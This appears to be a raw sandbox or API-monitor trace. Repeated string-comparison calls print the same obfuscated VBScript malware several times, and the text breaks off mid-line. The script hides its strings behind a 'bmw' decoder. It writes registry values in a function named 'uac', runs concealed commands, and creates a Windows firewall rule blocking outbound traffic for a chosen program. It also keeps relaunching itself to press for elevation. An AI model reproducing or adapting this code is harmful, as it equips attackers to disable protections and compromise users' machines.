bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 107 [0222.967] wcsncmp (_String1="4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 39 [0222.967] wcsncmp (_String1="-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 32 [0222.967] wcsncmp (_String1="id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92 [0222.967] wcsncmp (_String1="d)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite 